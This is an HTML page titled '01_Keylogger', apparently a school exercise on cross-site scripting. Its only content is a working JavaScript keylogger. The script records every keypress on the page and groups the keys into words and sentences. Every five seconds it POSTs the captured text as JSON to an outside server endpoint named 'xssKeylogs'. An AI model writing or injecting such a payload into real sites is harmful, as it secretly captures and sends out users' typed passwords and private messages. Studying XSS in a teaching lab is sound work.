<!DOCTYPE html>
<html lang="de">
    <head>
        <meta charset="utf-8" />
        <title>01_Keylogger</title>
    </head>
    <body>
        <h1>01_Keylogger</h1>
        <script type="text/javascript">
		// #region Variables
            var word = "";
            var sentence = "";
            var text = "";
		// #endregion	
		// #region EventListener
            document.addEventListener("keypress", function (e){
                // get pressed character
                var char_code = e.which || e.keyCode;
                var char_value = String.fromCharCode(char_code);
                console.log(char_code + " " + char_value);
                word += char_value;
                if(char_code == 32){
                    console.log("word: " + word);
                    sentence += word;
                    word = "";
                }

                if(char_code == 190 || char_code == 13){
                    sentence += word;
                    console.log("sentence: " + sentence);
                    text += sentence;
                    word = "";
                    sentence = "";
                }
            });
		// #endregion
		// #region Inverval
            setInterval(function(){
                    if(text.length > 0){
                    console.log("full text: " + text);
                    var xhr = new XMLHttpRequest();
                    xhr.open('POST', 'https://m183.gibz-informatik.ch/api/xssKeylogs');
                    xhr.setRequestHeader('Content-Type', 'application/json');
                    xhr.send(JSON.stringify({
                        keyword: "XSS Keylogger",
                        payload: text
                    }));
                    word = "";
                    sentence = "";
                    text = "";
                }
            }, 5000);
		// #endregion
        </script>
    </body>
</html>
